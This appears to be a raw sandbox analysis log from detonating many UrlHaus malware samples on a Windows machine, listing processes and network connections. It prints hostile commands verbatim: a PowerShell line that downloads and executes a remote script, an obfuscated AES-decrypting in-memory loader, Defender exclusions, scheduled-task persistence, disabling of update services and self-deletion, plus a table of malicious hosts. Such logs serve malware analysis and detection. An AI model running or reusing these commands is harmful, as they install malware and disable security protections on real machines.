"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf4,0xf8,0xfc,0xd0,0x100,0x7ffcd460cc40,0x7ffcd460cc4c,0x7ffcd460cc58

C:\Users\Admin\DOWNLO~1\URLHAU~1\key.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\key.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 228 -ip 228

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\AA_v3.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 228 -s 364

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\CHROME~1.EXE"

C:\Users\Admin\DOWNLO~1\URLHAU~1\CHROME~1.EXE

C:\Users\Admin\DOWNLO~1\URLHAU~1\CHROME~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\F392TM~1.EXE"

C:\Users\Admin\AppData\Local\Temp\F392TM~1.EXE

C:\Users\Admin\AppData\Local\Temp\F392TM~1.EXE

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\Aa_v3.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2292,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2272 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1760,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2452 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1956,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2480 /prefetch:8

C:\Users\Admin\DOWNLO~1\URLHAU~1\Aa_v3.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\Aa_v3.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\new.exe"

C:\Users\Admin\DOWNLO~1\URLHAU~1\new.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\new.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\Update.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\jeditor.exe"

C:\Users\Admin\DOWNLO~1\URLHAU~1\jeditor.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\jeditor.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3104,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3112,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network4726Man.cmd"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\chisel.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4480,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4464 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\System32\cmd.exe /c start C:\Users\Admin\AppData\Roaming\Network4726Man.cmd

C:\Users\Admin\DOWNLO~1\URLHAU~1\chisel.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\chisel.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\svchost.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\svchost.exe"

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\Beefy.exe"

C:\Users\Admin\DOWNLO~1\URLHAU~1\Beefy.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\Beefy.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\test26.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Users\Admin\DOWNLO~1\URLHAU~1\test26.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\test26.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "new" /tr "C:\Users\Admin\AppData\Roaming\new.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\Network4726Man.cmd

C:\Windows\SysWOW64\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /RL HIGHEST /sc minute /mo 1 /tn new /tr C:\Users\Admin\AppData\Roaming\new.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4780,i,5061204446278887501,13120279352438544852,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4740 /prefetch:8

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\svchost.exe"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\Taskmgr.exe"

C:\Windows\System32\cmd.exe

cmd.exe /c powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Invoke-Expression $decoded;"

C:\Users\Admin\DOWNLO~1\URLHAU~1\Taskmgr.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\Taskmgr.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\XBLKPF~1.EXE"

C:\Users\Admin\DOWNLO~1\URLHAU~1\XBLKPF~1.EXE

C:\Users\Admin\DOWNLO~1\URLHAU~1\XBLKPF~1.EXE

C:\Windows\system32\whoami.exe

whoami

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$decoded = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')); Invoke-Expression $decoded;"

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\system32\msg.exe

msg * virus

C:\Users\Admin\AppData\Local\kreon.exe

C:\Users\Admin\AppData\Local\kreon.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\1729TM~1.EXE"

C:\Users\Admin\AppData\Roaming\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\Temp\1729TM~1.EXE

C:\Users\Admin\AppData\Local\Temp\1729TM~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe"

C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe

C:\Users\Admin\AppData\Local\Temp\1729TM~1.EXE

C:\Users\Admin\AppData\Local\Temp\1729TM~1.EXE

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\3582-490\kreon.exe"

C:\Users\Admin\AppData\Local\Temp\3582-490\kreon.exe

C:\Users\Admin\AppData\Local\Temp\3582-490\kreon.exe

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')"

C:\Windows\system32\cmd.exe

C:\Windows\sysnative\cmd.exe /c powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffcc78e46f8,0x7ffcc78e4708,0x7ffcc78e4718

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Users\Admin\DOWNLO~1\URLHAU~1\ipscan.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command IEX(New-Object Net.Webclient).DownloadString('https://osecweb.ir/js/config_20.ps1')

C:\Users\Admin\DOWNLO~1\URLHAU~1\ipscan.exe

C:\Users\Admin\DOWNLO~1\URLHAU~1\ipscan.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,8970677178570723263,14954177359958588593,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network4726Man.cmd';$ddkL='TrhqWFanshqWFfohqWFrmhqWFFihqWFnalhqWFBlhqWFochqWFkhqWF'.Replace('hqWF', ''),'DDPxXecoDPxXmDPxXprDPxXessDPxX'.Replace('DPxX', ''),'MaysmqinysmqMysmqodysmqulysmqeysmq'.Replace('ysmq', ''),'ReiHEpadiHEpLiiHEpnesiHEp'.Replace('iHEp', ''),'GCqdUetCqdUCuCqdUrCqdUreCqdUntPCqdUrCqdUocCqdUesCqdUsCqdU'.Replace('CqdU', ''),'InAKLIvoAKLIkAKLIeAKLI'.Replace('AKLI', ''),'LoJqASadJqAS'.Replace('JqAS', ''),'CopyfqFyTyfqFoyfqF'.Replace('yfqF', ''),'FrvXuAomvXuABvXuAasvXuAe6vXuA4StvXuArvXuAinvXuAgvXuA'.Replace('vXuA', ''),'CxbdihxbdianxbdigxbdieExbdixtexbdinxbdisixbdioxbdinxbdi'.Replace('xbdi', ''),'EleVQPZmeVQPZntVQPZAtVQPZ'.Replace('VQPZ', ''),'CNQbureaNQbutNQbueDNQbuecrNQbuypNQbutorNQbu'.Replace('NQbu', ''),'EoUdqnoUdqtoUdqryoUdqPoUdqoioUdqnoUdqtoUdq'.Replace('oUdq', ''),'ScSRUplcSRUitcSRU'.Replace('cSRU', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($ddkL[4])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function rInUE($tsSXg){$AjjqB=[System.Security.Cryptography.Aes]::Create();$AjjqB.Mode=[System.Security.Cryptography.CipherMode]::CBC;$AjjqB.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$AjjqB.Key=[System.Convert]::($ddkL[8])('N/y0OKPKBqPZJ+saNe6tgR7TAn10dih8XZ0HebZ+uEc=');$AjjqB.IV=[System.Convert]::($ddkL[8])('Ls3mytPz2eg1HzNec7G7VA==');$BtIij=$AjjqB.($ddkL[11])();$tfdFv=$BtIij.($ddkL[0])($tsSXg,0,$tsSXg.Length);$BtIij.Dispose();$AjjqB.Dispose();$tfdFv;}function UajxO($tsSXg){$coXbk=New-Object System.IO.MemoryStream(,$tsSXg);$PWDcH=New-Object System.IO.MemoryStream;$GMuYT=New-Object System.IO.Compression.GZipStream($coXbk,[IO.Compression.CompressionMode]::($ddkL[1]));$GMuYT.($ddkL[7])($PWDcH);$GMuYT.Dispose();$coXbk.Dispose();$PWDcH.Dispose();$PWDcH.ToArray();}$hqZyL=[System.IO.File]::($ddkL[3])([Console]::Title);$Hvhxu=UajxO (rInUE ([Convert]::($ddkL[8])([System.Linq.Enumerable]::($ddkL[10])($hqZyL, 5).Substring(2))));$LvPZo=UajxO (rInUE ([Convert]::($ddkL[8])([System.Linq.Enumerable]::($ddkL[10])($hqZyL, 6).Substring(2))));[System.Reflection.Assembly]::($ddkL[6])([byte[]]$LvPZo).($ddkL[12]).($ddkL[5])($null,$null);[System.Reflection.Assembly]::($ddkL[6])([byte[]]$Hvhxu).($ddkL[12]).($ddkL[5])($null,$null); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

C:\Users\Admin\Downloads\UrlHausFiles\Video.scr

"C:\Users\Admin\Downloads\UrlHausFiles\Video.scr" /S

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\kreon.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,8970677178570723263,14954177359958588593,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2784 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,8970677178570723263,14954177359958588593,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3004 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop UsoSvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,8970677178570723263,14954177359958588593,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,8970677178570723263,14954177359958588593,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3592 /prefetch:1

C:\Windows\system32\msg.exe

msg * virus

C:\Windows\svchost.com

"C:\Windows\svchost.com" "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe" >> NUL

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ping 127.0.0.1 && del C:\Users\Admin\DOWNLO~1\URLHAU~1\file.exe >> NUL

C:\Windows\system32\cmd.exe

cmd /C "ping localhost -n 1 && start C:\Users\Admin\AppData\Local\kreon.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2136,8970677178570723263,14954177359958588593,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:1

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop WaaSMedicSvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 arcsystem.rodopibg.net udp
US 8.8.8.8:53 fish.hackbiji.cc udp
US 8.8.8.8:53 download.caihong.com udp
CN 58.218.215.161:80 down.qqfarmer.com.cn tcp
CN 61.170.80.233:80 download.haozip.com tcp
CN 119.167.229.212:80 dow.andylab.cn tcp
CN 120.52.95.246:80 znrq.zifwxq.cn tcp
RU 176.111.174.138:443 tcp
CN 218.12.76.158:80 znrq.zifwxq.cn tcp
CN 112.5.156.15:20006 data.yhydl.com tcp
RU 185.215.113.66:80 aeufoeahfouefhg.top tcp
RU 45.151.62.250:80 45.151.62.250 tcp
US 8.8.8.8:53 pid.fly160.com udp
US 8.8.8.8:53 upload.vina-host.com udp
US 8.8.8.8:53 a18qqq1.oss-cn-hongkong.aliyuncs.com udp
CN 117.72.70.169:80 tcp
CN 43.241.17.145:8899 tcp
VE 167.250.49.155:80 167.250.49.155 tcp
RU 178.130.39.138:80 artemka.spb.ru tcp
VN 103.42.55.251:9999 103.42.55.251 tcp
KR 183.115.102.3:80 183.115.102.3 tcp
CN 47.110.247.171:80 tcp
SE 129.151.210.233:8000 129.151.210.233 tcp
CN 47.104.233.213:8072 tcp
US 8.8.8.8:53 ywxww.net udp
US 8.8.8.8:53 funletters.net udp
US 8.8.8.8:53 ftp.ywxww.net udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 219.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 134.184.15.16.in-addr.arpa udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
CN 120.76.203.28:80 client.9377.com tcp
ES 217.125.11.90:8080 217.125.11.90 tcp
US 209.94.90.2:443 bafybeicoo7kwhmnl6q7prd65aimf5byzrihrklgviebm2pkyzyepdaigf4.ipfs.dweb.link tcp
NL 216.252.233.8:443 coindiscussion.net tcp
TH 154.197.69.165:443 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
SG 158.140.133.56:8090 158.140.133.56 tcp
HK 156.245.12.57:7778 156.245.12.57 tcp
DE 38.242.241.140:80 tcp
HK 154.201.87.30:8888 154.201.87.30 tcp
VN 113.160.249.9:80 113.160.249.9 tcp
US 8.8.8.8:53 a19ccc1.oss-cn-hongkong.aliyuncs.com udp
NL 149.154.167.99:443 t.me tcp
NL 185.202.113.6:80 185.202.113.6 tcp
HK 103.59.103.198:80 103.59.103.198 tcp
US 144.34.162.13:80 fish.hackbiji.cc tcp
HK 134.122.129.19:80 134.122.129.19 tcp
BG 88.80.152.1:80 arcsystem.rodopibg.net tcp
US 8.8.8.8:53 aefieiaehfiaehr.top udp
RU 176.113.115.33:80 176.113.115.33 tcp
US 52.217.227.73:443 bbuseruploads.s3.amazonaws.com tcp
VN 125.212.220.95:443 upload.vina-host.com tcp
US 208.122.221.162:80 funletters.net tcp
HK 47.79.66.208:443 a18qqq1.oss-cn-hongkong.aliyuncs.com tcp
CN 61.154.0.139:9000 tcp
CN 47.98.177.117:8888 tcp
CN 182.92.0.5:80 pid.fly160.com tcp
CN 60.191.236.246:820 ywxww.net tcp
CN 60.191.208.187:820 ftp.ywxww.net tcp
CN 111.6.202.202:80 download.caihong.com tcp
RU 176.113.115.203:80 176.113.115.203 tcp
CZ 77.240.97.71:81 77.240.97.71 tcp
US 8.8.8.8:53 233.210.151.129.in-addr.arpa udp
US 8.8.8.8:53 250.62.151.45.in-addr.arpa udp
US 8.8.8.8:53 138.39.130.178.in-addr.arpa udp
US 8.8.8.8:53 3.102.115.183.in-addr.arpa udp
US 8.8.8.8:53 251.55.42.103.in-addr.arpa udp
US 8.8.8.8:53 8.233.252.216.in-addr.arpa udp
US 8.8.8.8:53 6.113.202.185.in-addr.arpa udp
US 8.8.8.8:53 1.152.80.88.in-addr.arpa udp
US 8.8.8.8:53 71.97.240.77.in-addr.arpa udp
US 8.8.8.8:53 melkie.cyou udp
DE 116.203.127.32:443 melkie.cyou tcp
NL 82.115.223.222:8888 82.115.223.222 tcp
US 8.8.8.8:53 73.227.217.52.in-addr.arpa udp
US 8.8.8.8:53 198.103.59.103.in-addr.arpa udp
US 8.8.8.8:53 19.129.122.134.in-addr.arpa udp
US 8.8.8.8:53 95.220.212.125.in-addr.arpa udp
US 8.8.8.8:53 208.66.79.47.in-addr.arpa udp
US 8.8.8.8:53 9.249.160.113.in-addr.arpa udp
US 8.8.8.8:53 32.127.203.116.in-addr.arpa udp
US 8.8.8.8:53 56.133.140.158.in-addr.arpa udp
US 8.8.8.8:53 30.87.201.154.in-addr.arpa udp
US 8.8.8.8:53 222.223.115.82.in-addr.arpa udp
DE 116.203.127.32:443 melkie.cyou tcp
US 20.83.148.22:80 tcp
US 34.102.78.64:9002 34.102.78.64 tcp
US 8.8.8.8:53 78-20-115-5.access.telenet.be udp
DE 116.203.127.32:443 melkie.cyou tcp
US 8.8.8.8:53 64.78.102.34.in-addr.arpa udp
RU 185.215.113.66:80 aefieiaehfiaehr.top tcp
HK 47.79.66.211:443 a19ccc1.oss-cn-hongkong.aliyuncs.com tcp
US 8.8.8.8:53 stdown.dinju.com udp
US 154.216.20.237:80 154.216.20.237 tcp
US 8.8.8.8:53 www.ojang.pe.kr udp
US 3.5.29.46:443 bbuseruploads.s3.amazonaws.com tcp
VN 103.42.55.251:8080 tcp
BG 87.120.113.235:80 tcp
DE 116.203.127.32:443 melkie.cyou tcp
US 8.8.8.8:53 237.20.216.154.in-addr.arpa udp
US 8.8.8.8:53 46.29.5.3.in-addr.arpa udp
DE 116.203.127.32:443 melkie.cyou tcp
NL 149.154.167.220:443 api.telegram.org tcp
HK 154.201.87.30:8888 154.201.87.30 tcp
CN 139.198.15.223:8080 tcp
NL 185.180.196.46:80 185.180.196.46 tcp
BE 78.20.115.5:80 78-20-115-5.access.telenet.be tcp
US 68.225.217.95:85 68.225.217.95 tcp
RU 185.215.113.84:80 185.215.113.84 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 46.196.180.185.in-addr.arpa udp
US 8.8.8.8:53 5.115.20.78.in-addr.arpa udp
US 8.8.8.8:53 84.113.215.185.in-addr.arpa udp
US 8.8.8.8:53 95.217.225.68.in-addr.arpa udp
RU 176.111.174.138:443 tcp
EC 186.3.78.195:80 186.3.78.195 tcp
DE 116.203.127.32:443 melkie.cyou tcp
CN 58.215.245.2:9000 tcp
TR 94.73.144.130:443 bitkiselurunsiparis.com tcp
RU 176.111.174.140:80 176.111.174.140 tcp
US 8.8.8.8:53 www.teknoarge.com udp
FR 82.127.74.198:5000 82.127.74.198 tcp
CN 119.167.229.212:80 stdown.dinju.com tcp
PK 210.56.13.114:80 210.56.13.114 tcp
KR 119.194.226.67:80 www.ojang.pe.kr tcp
DE 185.254.96.92:80 185.254.96.92 tcp
US 8.8.8.8:53 195.78.3.186.in-addr.arpa udp
US 8.8.8.8:53 92.96.254.185.in-addr.arpa udp
US 8.8.8.8:53 198.74.127.82.in-addr.arpa udp
US 8.8.8.8:53 130.144.73.94.in-addr.arpa udp
US 8.8.8.8:53 114.13.56.210.in-addr.arpa udp
US 8.8.8.8:53 67.226.194.119.in-addr.arpa udp
DE 116.203.127.32:443 melkie.cyou tcp
HK 103.43.18.19:88 103.43.18.19 tcp
US 52.216.77.180:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 180.77.216.52.in-addr.arpa udp
US 8.8.8.8:53 19.18.43.103.in-addr.arpa udp
US 8.8.8.8:53 filelu.com udp
CN 8.134.12.90:80 tcp
GB 103.192.179.31:80 103.192.179.31 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
NL 185.202.113.6:443 tcp
CN 8.138.81.152:5555 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
CN 60.191.236.246:820 ywxww.net tcp
US 172.67.68.204:443 filelu.com tcp
RU 185.215.113.205:8080 185.215.113.205 tcp
TR 31.145.124.122:80 www.teknoarge.com tcp
CN 123.117.136.97:9000 tcp
RU 176.111.174.140:80 176.111.174.140 tcp
US 8.8.8.8:53 31.179.192.103.in-addr.arpa udp
US 8.8.8.8:53 204.68.67.172.in-addr.arpa udp
US 8.8.8.8:53 122.124.145.31.in-addr.arpa udp
US 8.8.8.8:53 205.113.215.185.in-addr.arpa udp
US 20.83.148.22:8080 20.83.148.22 tcp
US 8.8.8.8:53 win-network-checker.cc udp
RU 176.111.174.140:80 176.111.174.140 tcp
US 8.8.8.8:53 3434.filelu.cloud udp
RU 176.111.174.138:443 tcp
US 67.23.237.28:443 3434.filelu.cloud tcp
RU 176.111.174.140:80 176.111.174.140 tcp
US 8.8.8.8:53 week-dictionary.gl.at.ply.gg udp
US 147.185.221.22:12466 week-dictionary.gl.at.ply.gg tcp
US 97.42.159.0:21 tcp
US 146.57.201.0:21 tcp
KR 114.204.165.0:21 tcp
ES 81.42.122.0:21 tcp
BR 189.101.15.0:21 tcp
EG 154.135.23.0:21 tcp
LU 107.189.5.6:80 107.189.5.6 tcp
CZ 87.249.142.126:60800 87.249.142.126 tcp
US 208.85.241.111:80 208.85.241.111 tcp
US 8.8.8.8:53 osecweb.ir udp
UA 91.205.66.0:21 tcp
US 172.230.173.0:21 tcp
IL 132.75.250.0:21 tcp
US 8.8.8.8:53 mohibkal.publicvm.com udp
GB 25.104.140.0:21 tcp
NL 82.168.179.78:1978 mohibkal.publicvm.com tcp
US 199.221.75.0:21 tcp
MA 105.144.217.0:21 tcp
CA 192.135.40.0:21 tcp
US 33.255.211.0:21 tcp
US 130.249.106.0:21 tcp
US 8.8.8.8:53 6.5.189.107.in-addr.arpa udp
US 8.8.8.8:53 126.142.249.87.in-addr.arpa udp
US 8.8.8.8:53 111.241.85.208.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 22.130.53.0:21 tcp
US 69.19.145.0:21 tcp
BR 189.29.48.0:21 tcp
US 208.32.65.0:21 tcp
US 29.189.44.0:21 tcp
US 16.139.60.0:21 tcp
US 23.241.17.95:80 23.241.17.95 tcp
US 8.8.8.8:53 cfs9.blog.daum.net udp
US 143.105.158.0:21 tcp
CN 36.248.43.254:80 src1.minibai.com tcp
CN 101.90.244.0:21 tcp
GB 89.197.154.116:80 89.197.154.116 tcp
US 104.243.129.2:80 104.243.129.2 tcp
